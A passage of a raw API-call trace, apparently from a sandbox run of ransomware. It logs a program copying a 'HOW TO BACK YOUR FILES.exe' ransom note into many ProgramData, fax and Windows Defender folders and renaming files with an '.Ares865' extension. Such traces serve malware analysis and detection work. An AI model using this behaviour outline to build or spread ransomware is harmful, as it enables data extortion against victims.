NT\\MSFax\\Queue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\queue\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.549] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.549] GetLastError () returned 0x0 [0090.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.549] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.549] CloseHandle (hObject=0x120) returned 1 [0090.549] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.549] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.549] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.549] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" [0090.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" [0090.550] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.550] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\inbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.550] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.550] GetLastError () returned 0x0 [0090.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.550] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.550] CloseHandle (hObject=0x120) returned 1 [0090.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.551] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.551] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0090.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0090.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\common coverpages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.552] GetLastError () returned 0x0 [0090.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.552] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.552] CloseHandle (hObject=0x120) returned 1 [0090.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.552] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.553] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.553] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0090.553] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0090.553] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.553] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.553] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.554] GetLastError () returned 0x0 [0090.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.554] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.554] CloseHandle (hObject=0x120) returned 1 [0090.554] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.554] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x63704b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63704b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.554] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.554] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.554] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0090.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0090.554] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.554] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\activitylog\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.555] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.555] GetLastError () returned 0x0 [0090.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.555] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.555] CloseHandle (hObject=0x120) returned 1 [0090.555] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.555] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.556] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender" [0090.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender" [0090.556] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.556] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.556] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.557] GetLastError () returned 0x0 [0090.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.557] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.557] CloseHandle (hObject=0x120) returned 1 [0090.557] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.557] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.557] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.557] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.557] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support" [0090.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support" [0090.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.558] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\support\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.558] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.558] GetLastError () returned 0x0 [0090.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.558] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.558] CloseHandle (hObject=0x120) returned 1 [0090.559] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.559] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66843220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66843220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.559] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.559] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.559] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 121 [0090.559] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.559] GetLastError () returned 0x20 [0090.559] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 143 [0090.559] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 143 [0090.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.559] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4870 [0090.559] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x8f, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x8f, lpOverlapped=0x0) returned 1 [0090.560] CloseHandle (hObject=0x118) returned 1 [0090.560] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.560] CloseHandle (hObject=0x0) returned 0 [0090.560] CloseHandle (hObject=0x0) returned 0 [0090.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.560] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.560] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans" [0090.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0090.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0090.560] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans") returned 85 [0090.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans" [0090.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.561] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.561] GetLastError () returned 0x0 [0090.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.561] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.561] CloseHandle (hObject=0x120) returned 1 [0090.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.561] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c420720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.561] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c420720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.562] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: 